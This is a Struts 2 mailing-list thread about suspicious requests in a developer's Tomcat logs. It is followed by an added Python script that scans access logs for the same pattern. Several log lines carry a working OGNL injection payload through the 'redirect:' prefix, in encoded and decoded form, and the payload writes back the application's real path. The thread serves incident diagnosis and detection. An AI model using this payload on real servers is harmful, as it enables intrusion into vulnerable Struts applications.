This is the vulnerability that was addressed in Struts 2.3.15.1.
On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL <jlm...@gmail.com> wrote:

> What version of Struts are you using? It seems
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
>
> transforms to
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()} HTTP/1.0" 200 74
>
> That basically returns on the response the real path of your application.
>
>
> 2014-01-30 Amol Ghotankar <ghotankaru...@gmail.com>
>
> > I have seen some sample app for testing which was developed using struts2.
> >
> > I saw some unknown files getting uploaded on test.
> >
> > I initially thought that my tomcat was hacked or my server was hacked, but now after a close analysis it looks like a struts2 webwork security issue or vulnerability, or maybe my misconfiguration or something; not sure.
> >
> > Can anyone in the struts2 team fix this globally and help me get rid of this locally without version upgrades.....
> >
> > Here are the tomcat logs which clearly tell the story:
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
> >
> > I hope my issue is clear and valid.
> >
> > Original issue on stackoverflow at
> > http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole
> >
> > --
> > *With Best Regards,*
> > Amol Ghotankar
> > Technical Lead
> > M: +91 9960 980 419 <http://www.cursivetech.com>
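An added example, not part of the thread: a small access-log scanner that applies the same percent-decoding the reply above did by hand and flags requests where the Struts 2 `redirect:` / `redirectAction:` parameter prefix carries an OGNL `${...}` expression, while leaving a plain redirect target alone. The sample log lines are constructed (payloads shortened) and the `10.0.0.x` entries are invented to show the benign case.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the Tomcat access-log entries quoted in the thread
# (payloads shortened; the 10.0.0.x lines are invented to show a benign use of the prefix).
SAMPLE_LOG = """\
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')%7D HTTP/1.0" 200 74
10.0.0.5 - - [27/Jan/2014:17:52:01 +0530] "GET /common/list.action?page=2 HTTP/1.0" 200 1532
10.0.0.6 - - [27/Jan/2014:17:52:09 +0530] "GET /common/go.action?redirectAction:%24%7B%23x%3d1%7D HTTP/1.0" 302 0
10.0.0.7 - - [27/Jan/2014:17:52:15 +0530] "GET /common/go.action?redirect:/common/home.action HTTP/1.0" 302 0
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD URL PROTOCOL", status, bytes
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Action-mapper parameter prefixes that Struts 2 honoured before 2.3.15.1 (S2-016).
PREFIX_RE = re.compile(r'(?:^|&)(?P<prefix>redirect|redirectAction):(?P<value>[^&]*)')

def decode_query(url):
    """Percent-decode the query string; this is the transformation shown in the reply."""
    return unquote(url.partition('?')[2])

def flag_s2_016(line):
    """Return a finding dict when a redirect prefix carries an OGNL expression, else None."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    p = PREFIX_RE.search(decode_query(m['url']))
    if p is None or '${' not in p['value']:
        return None  # no prefix, or a plain target such as redirect:/common/home.action
    return {
        'client': m['client'], 'ts': m['ts'], 'status': int(m['status']),
        'path': m['url'].partition('?')[0],
        'prefix': p['prefix'], 'ognl': p['value'],
    }

def scan(log_text):
    """Scan a whole access log and return the flagged requests in file order."""
    return [hit for hit in map(flag_s2_016, log_text.splitlines()) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['path']} "
              f"{hit['prefix']}: {hit['ognl']} -> HTTP {hit['status']}")
```

A `200` with a tiny response body on a flagged line, as in the thread, is worth correlating with the application's deployment path, since that is what the expression writes back.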